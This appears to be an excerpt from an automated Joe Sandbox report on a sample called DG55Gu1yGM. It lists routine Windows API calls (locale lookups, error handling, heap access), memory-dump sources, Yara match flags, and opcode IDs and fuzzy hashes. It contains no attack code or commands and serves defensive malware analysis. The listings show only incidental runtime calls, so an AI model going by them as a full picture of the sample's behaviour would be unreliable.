                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                        • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0215B87A,00000000,00000000,?), ref: 0215BB08
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 787680540-0
                                                                                                                                                                                                                                        • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                        • Instruction ID: f63bd8e1dfa545780bc6b508a236cd224d1b1f4ca54654a9f6b2ad46b44c8e5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AF0F932A84535EBDB385A24CC45BBAB759EB4071CF0504A9DC25A3148EBB4BF01C6D0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 787680540-0
                                                                                                                                                                                                                                        • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                        • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0215B900
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2955987475-0
                                                                                                                                                                                                                                        • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                        • Instruction ID: cc5f61511d11f8d0493666905825e2084d85f26e1dabf6228f2d9c559cfa0728
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C014932B95124DFCB14AF34DC80ABA33A9DF05311F0441FAEE12DB281DB355E048B50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B645,00000001,00000006,?,02150A1C,?,0215BC4D,02150A1C,?,?,?,?,?,02150A1C,?,?), ref: 0215B61B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                        • Instruction ID: b516d1b0ac5d9933a959eda907d217c0dea80a0b6278f930da6196a73f09f9ad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5F022363047149FDB245F39DC80B7ABBD1EF8032CF1440ACFE058B640D77199028A84
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                        • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0215047A,?,00000004), ref: 0215547A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                        • Instruction ID: 9fb8a9466bc970bd76f910d33cd16e61a4e42a3e53a39d50847b73e648a73a9f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F096316C0328FFDB155F60DC01F6E7B66EF04B12F504155FD1566190DB719920AA99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0214E654: RtlEnterCriticalSection.NTDLL(01CD0DAF), ref: 0214E663
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0215506C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                        • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                        • Instruction ID: b6eb457f5ff10e666bda82094dfe30fa0b79a3fb9656d8377797ef75a17bf0ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73F03C32A50314DFEB10EF68D905B5D77E1AF05721F104266F914DB2E1CB7599408F49
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                        • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                        • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,00000006,?,?,0215BCAB,02150A1C,?,?,?,?,?,02150A1C,?,?,?), ref: 0215B520
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                        • Instruction ID: 35f680edbebab78852d78be61974037db48c71b566162fade5e959ba2068a9aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F0553A34020897CB089F36DC4476ABF90EFC1754F0A009DEF1A8B290C3319942C790
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                        • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00410672,0212FE60), ref: 021308D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                        • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                        • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                        • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                        • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f9653ad00092ae3c397eaa5fd62b1023da30322e2c3038988a006d2826d0943b
                                                                                                                                                                                                                                        • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9653ad00092ae3c397eaa5fd62b1023da30322e2c3038988a006d2826d0943b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                        • Instruction ID: 7de1b4a7a72910040d81cf13f9975e42ec218cbf50fb294efffadb8f94a8f1eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4D1B5721481E30ACB2D4A39847443AFFE26B421A530E47AED4FBCA5C6EF24D656D660
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                        • Instruction ID: 8da643550bc72396a068e7c871e35f0a9939067fd46eea51133b5dd34805198c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E9175721490E34EEB6D463E887443EFEE15B426A530B079ED8FACB1C1EF24D655D620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                        • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                        • Instruction ID: 22e64b7d6925aafd8a97cbc1014c6b7ed4fb1ee68808eada531bd7cf62e36743
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 079163722490E34AEB6D467E893413EFFE15B421A530F07ADD4FACA1C5EF24C655D620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                        • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
